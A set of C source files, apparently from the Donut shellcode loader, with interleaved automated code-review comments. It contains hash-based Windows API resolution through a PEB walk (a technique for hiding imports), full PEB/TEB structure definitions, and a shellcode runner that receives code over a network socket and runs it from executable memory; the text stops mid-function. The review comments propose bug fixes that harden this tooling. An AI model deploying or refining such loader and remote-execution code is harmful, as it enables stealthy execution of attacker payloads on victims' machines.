19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // locate address of API in export table using Maru hash function
32 LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
33 PIMAGE_DOS_HEADER dos;
34 PIMAGE_NT_HEADERS nt;
35 DWORD i, j, cnt, rva;
36 PIMAGE_DATA_DIRECTORY dir;
37 PIMAGE_EXPORT_DIRECTORY exp;
38 PDWORD adr;
39 PDWORD sym;
40 PWORD ord;
41 PCHAR api, dll, p;
42 LPVOID addr=NULL;
43 ULONG64 dll_hash;
44 CHAR buf[MAX_PATH], dll_name[64], api_name[128];
45
46 dos = (PIMAGE_DOS_HEADER)base;
47 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
48 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
49 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
50
51 // if no export table, return NULL
52 if (rva==0) return NULL;
53
54 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
55 cnt = exp->NumberOfNames;
56
57 // if no api names, return NULL
58 if (cnt==0) return NULL;
59
60 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
61 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
62 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
63 dll = RVA2VA(PCHAR, base, exp->Name);
64
65 // get hash of DLL string converted to lowercase
66 for(i=0;dll[i]!=0;i++) {
67 buf[i] = dll[i] | 0x20;
68 }
69 buf[i] = 0;
70 dll_hash = maru(buf, iv);
71
72 do {
73 // calculate hash of api string
74 api = RVA2VA(PCHAR, base, sym[cnt-1]);
75 // xor with DLL hash and compare with hash to find
76 if ((maru(api, iv) ^ dll_hash) == api_hash) {
77 // return address of function
78 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
79
80 // is this a forward reference?
81 if ((PBYTE)addr >= (PBYTE)exp &&
82 (PBYTE)addr < (PBYTE)exp +
83 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
84 {
85 DPRINT("%016llx is forwarded to %s",
86 api_hash, (char*)addr);
87
88 // copy DLL name to buffer
89 p=(char*)addr;
90
91 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
92 dll_name[i] = p[i];
93 if(p[i] == '.') break;
94 }
95
96 dll_name[i+1] = 'd';
97 dll_name[i+2] = 'l';
98 dll_name[i+3] = 'l';
99 dll_name[i+4] = 0;
100
101 p += i + 1;
102
103 // copy API name to buffer
104 for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
105 api_name[i] = p[i];
106 }
107 api_name[i] = 0;
108
109 DPRINT("Trying to load %s", dll_name);
110 HMODULE hModule = inst->api.LoadLibrary(dll_name);
111
112 if(hModule != NULL) {
113 DPRINT("Calling GetProcAddress(%s)", api_name);
114 addr = inst->api.GetProcAddress(hModule, api_name);
115 } else addr = NULL;
116 }
117 return addr;
118 }
119 } while (--cnt && addr == NULL);
120
121 return addr;
122 }
123
124 // search all modules in the PEB for API
125 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
126 PPEB peb;
127 PPEB_LDR_DATA ldr;
128 PLDR_DATA_TABLE_ENTRY dte;
129 LPVOID addr = NULL;
130
131 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
132 ldr = (PPEB_LDR_DATA)peb->Ldr;
133
134 // for each DLL loaded
135 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
136 dte->DllBase != NULL && addr == NULL;
137 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
138 {
139 // search the export table for api
140 addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
141 }
142 return addr;
143 }
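Review bot: The lowercase copy of the export-directory DLL name into `buf` (the `for(i=0;dll[i]!=0;i++)` loop in FindExport) has no length bound, so a module whose `exp->Name` string is MAX_PATH bytes or longer overwrites the stack past the buffer; bound it as `for(i=0; dll[i]!=0 && i < sizeof(buf)-1; i++)`. The forwarder branch has a related gap: the `dll_name` loop stops on '.', on NUL and on the size limit alike, yet the code then appends the `dll` suffix and advances `p += i + 1` as if a dot had been found, so a forwarder string without a dot (or one longer than the buffer) produces a garbage DLL name and an API name read from past the terminator — `if(p[i] != '.') return NULL;` after that loop closes it. Ordinal forwarders of the `DLL.#nnn` form would also reach `GetProcAddress` as the literal string `#nnn`, which does not resolve, so a comment that only name-forwarders are handled is warranted. The `| 0x20` lowering additionally maps '_' to 0x7F; that is only correct if the hash generator applies the identical transform, which is presumably the case but worth confirming against it.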
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _STRING {
45 USHORT Length;
46 USHORT MaximumLength;
47 PCHAR Buffer;
48 } STRING, *PSTRING, ANSI_STRING, *PANSI_STRING;
49
50 typedef struct _RTL_USER_PROCESS_PARAMETERS {
51 BYTE Reserved1[16];
52 PVOID Reserved2[10];
53 UNICODE_STRING ImagePathName;
54 UNICODE_STRING CommandLine;
55 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
56
57 // PEB defined by rewolf
58 // http://blog.rewolf.pl/blog/?p=573
59 typedef struct _PEB_LDR_DATA {
60 ULONG Length;
61 BOOL Initialized;
62 LPVOID SsHandle;
63 LIST_ENTRY InLoadOrderModuleList;
64 LIST_ENTRY InMemoryOrderModuleList;
65 LIST_ENTRY InInitializationOrderModuleList;
66 } PEB_LDR_DATA, *PPEB_LDR_DATA;
67
68 typedef struct _LDR_DATA_TABLE_ENTRY
69 {
70 LIST_ENTRY InLoadOrderLinks;
71 LIST_ENTRY InMemoryOrderLinks;
72 LIST_ENTRY InInitializationOrderLinks;
73 LPVOID DllBase;
74 LPVOID EntryPoint;
75 ULONG SizeOfImage;
76 UNICODE_STRING FullDllName;
77 UNICODE_STRING BaseDllName;
78 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
79
80 typedef struct _PEB {
81 BYTE InheritedAddressSpace;
82 BYTE ReadImageFileExecOptions;
83 BYTE BeingDebugged;
84 BYTE _SYSTEM_DEPENDENT_01;
85
86 LPVOID Mutant;
87 LPVOID ImageBaseAddress;
88
89 PPEB_LDR_DATA Ldr;
90 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
91 LPVOID SubSystemData;
92 LPVOID ProcessHeap;
93 LPVOID FastPebLock;
94 LPVOID _SYSTEM_DEPENDENT_02;
95 LPVOID _SYSTEM_DEPENDENT_03;
96 LPVOID _SYSTEM_DEPENDENT_04;
97 union {
98 LPVOID KernelCallbackTable;
99 LPVOID UserSharedInfoPtr;
100 };
101 DWORD SystemReserved;
102 DWORD _SYSTEM_DEPENDENT_05;
103 LPVOID _SYSTEM_DEPENDENT_06;
104 LPVOID TlsExpansionCounter;
105 LPVOID TlsBitmap;
106 DWORD TlsBitmapBits[2];
107 LPVOID ReadOnlySharedMemoryBase;
108 LPVOID _SYSTEM_DEPENDENT_07;
109 LPVOID ReadOnlyStaticServerData;
110 LPVOID AnsiCodePageData;
111 LPVOID OemCodePageData;
112 LPVOID UnicodeCaseTableData;
113 DWORD NumberOfProcessors;
114 union
115 {
116 DWORD NtGlobalFlag;
117 LPVOID dummy02;
118 };
119 LARGE_INTEGER CriticalSectionTimeout;
120 LPVOID HeapSegmentReserve;
121 LPVOID HeapSegmentCommit;
122 LPVOID HeapDeCommitTotalFreeThreshold;
123 LPVOID HeapDeCommitFreeBlockThreshold;
124 DWORD NumberOfHeaps;
125 DWORD MaximumNumberOfHeaps;
126 LPVOID ProcessHeaps;
127 LPVOID GdiSharedHandleTable;
128 LPVOID ProcessStarterHelper;
129 LPVOID GdiDCAttributeList;
130 LPVOID LoaderLock;
131 DWORD OSMajorVersion;
132 DWORD OSMinorVersion;
133 WORD OSBuildNumber;
134 WORD OSCSDVersion;
135 DWORD OSPlatformId;
136 DWORD ImageSubsystem;
137 DWORD ImageSubsystemMajorVersion;
138 LPVOID ImageSubsystemMinorVersion;
139 union
140 {
141 LPVOID ImageProcessAffinityMask;
142 LPVOID ActiveProcessAffinityMask;
143 };
144 #ifdef _WIN64
145 LPVOID GdiHandleBuffer[64];
146 #else
147 LPVOID GdiHandleBuffer[32];
148 #endif
149 LPVOID PostProcessInitRoutine;
150 LPVOID TlsExpansionBitmap;
151 DWORD TlsExpansionBitmapBits[32];
152 LPVOID SessionId;
153 ULARGE_INTEGER AppCompatFlags;
154 ULARGE_INTEGER AppCompatFlagsUser;
155 LPVOID pShimData;
156 LPVOID AppCompatInfo;
157 PUNICODE_STRING CSDVersion;
158 LPVOID ActivationContextData;
159 LPVOID ProcessAssemblyStorageMap;
160 LPVOID SystemDefaultActivationContextData;
161 LPVOID SystemAssemblyStorageMap;
162 LPVOID MinimumStackCommit;
163 } PEB, *PPEB;
164
165
166 typedef struct _CLIENT_ID {
167 HANDLE UniqueProcess;
168 HANDLE UniqueThread;
169 } CLIENT_ID, *PCLIENT_ID;
170
171 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
172 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
173 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
174 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
175
176 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
177 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
178 PACTIVATION_CONTEXT *ActivationContext;
179 ULONG Flags;
180 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
181
182 typedef struct _ACTIVATION_CONTEXT_STACK
183 {
184 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
185 LIST_ENTRY FrameListCache;
186 ULONG Flags;
187 ULONG NextCookieSequenceNumber;
188 ULONG StackId;
189 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
190 #define GDI_BATCH_BUFFER_SIZE 310
191
192 typedef struct _GDI_TEB_BATCH
193 {
194 ULONG Offset;
195 ULONG_PTR HDC;
196 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
197 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
198
199 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
200 {
201 ULONG Flags;
202 PSTR FrameName;
203 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
204
205 typedef struct _TEB_ACTIVE_FRAME
206 {
207 ULONG Flags;
208 struct _TEB_ACTIVE_FRAME *Previous;
209 PTEB_ACTIVE_FRAME_CONTEXT Context;
210 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
211
212 #if !defined(_MSC_VER)
213 typedef struct _PROCESSOR_NUMBER {
214 USHORT Group;
215 UCHAR Number;
216 UCHAR Reserved;
217 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
218 #endif
219
220 typedef struct _TEB
221 {
222 NT_TIB NtTib;
223
224 PVOID EnvironmentPointer;
225 CLIENT_ID ClientId;
226 PVOID ActiveRpcHandle;
227 PVOID ThreadLocalStoragePointer;
228 PPEB ProcessEnvironmentBlock;
229
230 ULONG LastErrorValue;
231 ULONG CountOfOwnedCriticalSections;
232 PVOID CsrClientThread;
233 PVOID Win32ThreadInfo;
234 ULONG User32Reserved[26];
235 ULONG UserReserved[5];
236 PVOID WOW32Reserved;
237 LCID CurrentLocale;
238 ULONG FpSoftwareStatusRegister;
239 PVOID SystemReserved1[54];
240 NTSTATUS ExceptionCode;
241 PVOID ActivationContextStackPointer;
242 #ifdef _M_X64
243 UCHAR SpareBytes[24];
244 #else
245 UCHAR SpareBytes[36];
246 #endif
247 ULONG TxFsContext;
248
249 GDI_TEB_BATCH GdiTebBatch;
250 CLIENT_ID RealClientId;
251 HANDLE GdiCachedProcessHandle;
252 ULONG GdiClientPID;
253 ULONG GdiClientTID;
254 PVOID GdiThreadLocalInfo;
255 ULONG_PTR Win32ClientInfo[62];
256 PVOID glDispatchTable[233];
257 ULONG_PTR glReserved1[29];
258 PVOID glReserved2;
259 PVOID glSectionInfo;
260 PVOID glSection;
261 PVOID glTable;
262 PVOID glCurrentRC;
263 PVOID glContext;
264
265 NTSTATUS LastStatusValue;
266 UNICODE_STRING StaticUnicodeString;
267 WCHAR StaticUnicodeBuffer[261];
268
269 PVOID DeallocationStack;
270 PVOID TlsSlots[64];
271 LIST_ENTRY TlsLinks;
272
273 PVOID Vdm;
274 PVOID ReservedForNtRpc;
275 PVOID DbgSsReserved[2];
276
277 ULONG HardErrorMode;
278 #ifdef _M_X64
279 PVOID Instrumentation[11];
280 #else
281 PVOID Instrumentation[9];
282 #endif
283 GUID ActivityId;
284
285 PVOID SubProcessTag;
286 PVOID EtwLocalData;
287 PVOID EtwTraceData;
288 PVOID WinSockData;
289 ULONG GdiBatchCount;
290
291 union
292 {
293 PROCESSOR_NUMBER CurrentIdealProcessor;
294 ULONG IdealProcessorValue;
295 struct
296 {
297 UCHAR ReservedPad0;
298 UCHAR ReservedPad1;
299 UCHAR ReservedPad2;
300 UCHAR IdealProcessor;
301 };
302 };
303
304 ULONG GuaranteedStackBytes;
305 PVOID ReservedForPerf;
306 PVOID ReservedForOle;
307 ULONG WaitingOnLoaderLock;
308 PVOID SavedPriorityState;
309 ULONG_PTR SoftPatchPtr1;
310 PVOID ThreadPoolData;
311 PVOID *TlsExpansionSlots;
312 #ifdef _M_X64
313 PVOID DeallocationBStore;
314 PVOID BStoreLimit;
315 #endif
316 ULONG MuiGeneration;
317 ULONG IsImpersonating;
318 PVOID NlsCache;
319 PVOID pShimData;
320 ULONG HeapVirtualAffinity;
321 HANDLE CurrentTransactionHandle;
322 PTEB_ACTIVE_FRAME ActiveFrame;
323 PVOID FlsData;
324
325 PVOID PreferredLanguages;
326 PVOID UserPrefLanguages;
327 PVOID MergedPrefLanguages;
328 ULONG MuiImpersonation;
329
330 union
331 {
332 USHORT CrossTebFlags;
333 USHORT SpareCrossTebBits : 16;
334 };
335 union
336 {
337 USHORT SameTebFlags;
338 struct
339 {
340 USHORT SafeThunkCall : 1;
341 USHORT InDebugPrint : 1;
342 USHORT HasFiberData : 1;
343 USHORT SkipThreadAttach : 1;
344 USHORT WerInShipAssertCode : 1;
345 USHORT RanProcessInit : 1;
346 USHORT ClonedThread : 1;
347 USHORT SuppressDebugMsg : 1;
348 USHORT DisableUserStackWalk : 1;
349 USHORT RtlExceptionAttached : 1;
350 USHORT InitialThread : 1;
351 USHORT SessionAware : 1;
352 USHORT SpareSameTebBits : 4;
353 };
354 };
355
356 PVOID TxnScopeEnterCallback;
357 PVOID TxnScopeExitCallback;
358 PVOID TxnScopeContext;
359 ULONG LockCount;
360 ULONG SpareUlong0;
361 PVOID ResourceRetValue;
362 PVOID ReservedForWdf;
363 } TEB, *PTEB;
364
365 #endif
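Review bot: The PEB/TEB definitions carry no note on which members the loader actually depends on, although many of them are placeholders (`_SYSTEM_DEPENDENT_*`, `dummy02`, `Reserved*`, `SpareBytes`) whose layout differs between Windows versions and bitness. From the accompanying peb.c, the only members read are `TEB.ProcessEnvironmentBlock`, `PEB.Ldr`, `PEB_LDR_DATA.InLoadOrderModuleList` and `LDR_DATA_TABLE_ENTRY.InLoadOrderLinks`/`DllBase`, all near the start of their structures. A header comment such as `// Only the leading members (NtTib..ProcessEnvironmentBlock, PEB.Ldr, InLoadOrderModuleList, InLoadOrderLinks/DllBase) are relied upon; the remaining fields are best-effort and version-dependent` would keep a future edit to the trailing fields from being mistaken for a functional change, and flag an edit to the leading ones as one that needs testing.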
0
1 /**
2 Copyright © 2016-2019 Odzhan. All Rights Reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are
6 met:
7
8 1. Redistributions of source code must retain the above copyright
9 notice, this list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright
12 notice, this list of conditions and the following disclaimer in the
13 documentation and/or other materials provided with the distribution.
14
15 3. The name of the author may not be used to endorse or promote products
16 derived from this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19 IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25 HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26 STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27 ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28 POSSIBILITY OF SUCH DAMAGE. */
29
30 #if defined(_WIN32) || defined(_WIN64)
31 #ifndef _WIN32_WINNT
32 #define _WIN32_WINNT 0x0502
33 #endif
34 #define WIN
35 #ifndef _WINSOCKAPI_
36 #define _WINSOCKAPI_
37 #endif
38 #include <windows.h>
39 #include <shlwapi.h>
40 #include <winsock2.h>
41 #include <ws2tcpip.h>
42 #define close closesocket
43 #define SHUT_RDWR SD_BOTH
44 #pragma comment(lib, "ws2_32.lib")
45 #pragma comment(lib, "shlwapi.lib")
46 #else
47 #include <unistd.h>
48 #include <sys/socket.h>
49 #include <sys/types.h>
50 #include <sys/mman.h>
51 #include <arpa/inet.h>
52 #include <netdb.h>
53 #include <netinet/in.h>
54 #include <sys/ioctl.h>
55 #include <net/if.h>
56 #include <signal.h>
57 #include <fcntl.h>
58 #endif
59
60 #include <stdio.h>
61 #include <stdint.h>
62 #include <string.h>
63 #include <stdlib.h>
64 #include <time.h>
65 #include <sys/stat.h>
66
67 #define RSC_CLIENT 0
68 #define RSC_SERVER 1
69 #define RSC_EXEC 2
70
71 #define RSC_SEND 0
72 #define RSC_RECV 1
73
74 #define DEFAULT_PORT "4444"
75
76 // structure for parameters
77 typedef struct _args_t {
78 int s, r;
79 char *port, *address, *file;
80 #ifdef WIN
81 char *modules;
82 #endif
83 int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
84 struct sockaddr *ai_addr;
85 struct sockaddr_in v4;
86 struct sockaddr_in6 v6;
87 char ip[INET6_ADDRSTRLEN];
88 uint32_t code_len;
89 void *code;
90 } args_t;
91
92 #ifdef WIN
93 /**F*****************************************************************/
94 void xstrerror (char *fmt, ...)
95 /**
96 * PURPOSE : Display windows error
97 *
98 * RETURN : Nothing
99 *
100 * NOTES : None
101 *
102 *F*/
103 {
104 char *error=NULL;
105 va_list arglist;
106 char buffer[2048];
107 DWORD dwError=GetLastError();
108
109 va_start (arglist, fmt);
110 wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
111 va_end (arglist);
112
113 if (FormatMessage (
114 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
115 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
116 (LPSTR)&error, 0, NULL))
117 {
118 printf ("[ %s : %s\n", buffer, error);
119 LocalFree (error);
120 } else {
121 printf ("[ %s : %i\n", buffer, dwError);
122 }
123 }
124 #else
125 #define xstrerror printf
126 #endif
127
128 char *addr2ip(args_t *p)
129 {
130 void *src;
131 #ifdef WIN
132 DWORD ip_size=INET6_ADDRSTRLEN;
133 WSAAddressToString (p->ai_addr, p->ai_addrlen,
134 NULL, (char*)p->ip, &ip_size);
135 #else
136 if (p->ai_family==AF_INET) {
137 src=(void*)&p->v4.sin_addr;
138 } else {
139 src=(void*)&p->v6.sin6_addr;
140 }
141 inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
142 #endif
143 return p->ip;
144 }
145
146 int init_network (args_t *p)
147 /**
148 * PURPOSE : initialize winsock for windows, resolve network address
149 *
150 * RETURN : 1 for okay else 0
151 *
152 * NOTES : None
153 *
154 *F*/
155 {
156 struct addrinfo *list=NULL, *e=NULL;
157 struct addrinfo hints;
158 int r, t;
159
160 // initialize winsock if windows
161 #ifdef WIN
162 WSADATA wsa;
163 WSAStartup (MAKEWORD (2, 0), &wsa);
164 #endif
165
166 r=0;
167 // set network address length to zero
168 p->ai_addrlen = 0;
169
170 // if no address supplied
171 if (p->address==NULL)
172 {
173 // is it ipv4?
174 if (p->ai_family==AF_INET) {
175 p->v4.sin_family = AF_INET;
176 p->v4.sin_port = htons((u_short)p->port_nbr);
177 p->v4.sin_addr.s_addr = INADDR_ANY;
178 p->ai_addr = (struct sockaddr*)&p->v4;
179 p->ai_addrlen = sizeof (struct sockaddr_in);
180 } else {
181 // else it's ipv6
182 p->v6.sin6_family = AF_INET6;
183 p->v6.sin6_port = htons((u_short)p->port_nbr);
184 p->v6.sin6_addr = in6addr_any;
185 p->ai_addr = (struct sockaddr*)&p->v6;
186 p->ai_addrlen = sizeof (struct sockaddr_in6);
187 }
188 } else {
189 memset (&hints, 0, sizeof (hints));
190
191 hints.ai_flags = AI_PASSIVE;
192 hints.ai_family = p->ai_family;
193 hints.ai_socktype = SOCK_STREAM;
194 hints.ai_protocol = IPPROTO_TCP;
195
196 // get all network addresses
197 t=getaddrinfo (p->address, p->port, &hints, &list);
198 if (t == 0)
199 {
200 for (e=list; e!=NULL; e=e->ai_next)
201 {
202 // copy to ipv4 structure
203 if (p->ai_family==AF_INET) {
204 memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
205 p->ai_addr = (struct sockaddr*)&p->v4;
206 } else {
207 // ipv6 structure
208 memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
209 p->ai_addr = (struct sockaddr*)&p->v6;
210 }
211 // assign size of structure
212 p->ai_addrlen = e->ai_addrlen;
213 break;
214 }
215 freeaddrinfo (list);
216 } else {
217 xstrerror ("getaddrinfo");
218 }
219 }
220 return p->ai_addrlen;
221 }
222
223 void debug(void *bin)
224 {
225 //
226 //__builtin_trap();
227 //raise(SIGTRAP);
228 }
229
230 // allocate read/write and executable memory
231 // copy data from p->code and execute
232 void xcode(args_t *p)
233 {
234 void *bin;
235 int i;
236 int fd[2048];
237
238 if (p->code_len == 0) {
239 printf("[ no code to execute.\n");
240 return;
241 }
242 printf ("[ executing code...");
243
244 #ifdef WIN
245 bin=VirtualAlloc (0, p->code_len,
246 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
247 #else
248 bin=mmap (0, p->code_len,
249 PROT_EXEC | PROT_WRITE | PROT_READ,
250 MAP_ANON | MAP_PRIVATE, -1, 0);
251 #endif
252 if (bin!=NULL)
253 {
254 memcpy (bin, p->code, p->code_len);
255 // create file/socket descriptors to simulate real system
256 // created interesting results on openbsd with limits
257 // to how many files could be open at once..
258 //
259 if (p->sim) {
260 #ifndef WIN
261 for (i=0; i<p->sim && p->sim<2048; i++) {
262 fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
263 }
264 #else
265 // todo
266 for (i=0; i<p->sim && p->sim<2048; i++) {
267 }
268 #endif
269 }
270
271 // debug the code?
272 if (p->dbg) {
273 #if defined(_WIN32) || defined(_WIN64)
274 DebugBreak();
275 #else
276 raise(SIGTRAP);
277 #endif
278 }
279
280 // execute
281 ((void(*)())bin)();
282
283 printf("OK!\n");
284
285 if (p->sim) {
286 #ifndef WIN
287 // close all descriptors
288 for (i=0; i<p->sim && p->sim<2048; i++) {
289 close(fd[i]);
290 }
291 #else
292 // todo
293 #endif
294 }
295 #ifdef WIN
296 VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
297 #else
298 munmap (bin, p->code_len);
299 #endif
300 }
301 }
302
303 void send_data(args_t *p, int s) {
304 FILE *fd;
305 int outlen, len, opt;
306 uint32_t sum;
307 uint8_t buf[BUFSIZ];
308
309 // open file for read in binary mode
310 printf ("[ opening %s for read\n", p->file);
311 fd = fopen(p->file, "rb");
312
313 if (fd != NULL)
314 {
315 // send contents of file
316 printf ("[ sending data\n");
317 for (;;) {
318 // read block
319 outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
320 // zero or less indicates EOF
321 if (outlen <= 0) break;
322 // send contents
323 for (sum=0; sum<outlen; sum += len) {
324 len=send (s, &buf[sum], outlen - sum, 0);
325 if (len <= 0) break;
326 }
327 p->code_len += sum;
328 if (outlen != sum) break;
329 }
330 printf ("[ sent %i bytes\n", p->code_len);
331 fclose(fd);
332 }
333 }
334
335 void recv_data(args_t *p, int s) {
336 int opt, r;
337 fd_set fds;
338 struct timeval tv;
339 void *pv;
340
341 p->code_len = 0;
342 p->code = malloc(BUFSIZ);
343
344 // set to non-blocking mode
345 #ifdef WIN
346 opt=1;
347 ioctlsocket (s, FIONBIO, (u_long*)&opt);
348 #else
349 opt=fcntl(s, F_GETFL, 0);
350 fcntl(s, F_SETFL, opt | O_NONBLOCK);
351 #endif
352 // keep reading until remote disconnects or we run out of memory
353 printf ("[ receiving data\n");
354
355 for (;;) {
356 FD_ZERO(&fds);
357 FD_SET(s, &fds);
358
359 tv.tv_sec = 5;
360 tv.tv_usec = 0;
361 r = select(FD_SETSIZE, &fds, 0, 0, &tv);
362
363 if (r <= 0) {
364 printf ("[ waiting for data timed out or failed\n");
365 break;
366 }
367 // receive a block
368 r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
369 if (r <= 0) break;
370 p->code_len += r;
371 // resize buffer
372 pv = realloc(p->code, p->code_len + BUFSIZ);
373 // on error, free pointer
374 if(pv == NULL) {
375 p->code_len = 0;
376 free(p->code);
377 p->code = NULL;
378 printf("[ error: out of memory.\n");
379 break;
380 }
381 p->code = pv;
382 }
383 if(p->code_len != 0) {
384 printf ("[ received %i bytes\n", p->code_len);
385 }
386 }
387
388 //
389 int ssr (args_t *p)
390 /**
391 * PURPOSE : send a shellcode or receive one from remote system and execute it
392 *
393 * RETURN : 0 or length of shellcode sent/received
394 *
395 * NOTES : None
396 *
397 *F*/
398 {
399 int s, opt, r, t;
400 fd_set fds;
401 struct timeval tv;
402
403 p->code_len=0;
404
405 // create socket
406 printf ("[ creating socket\n");
407 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
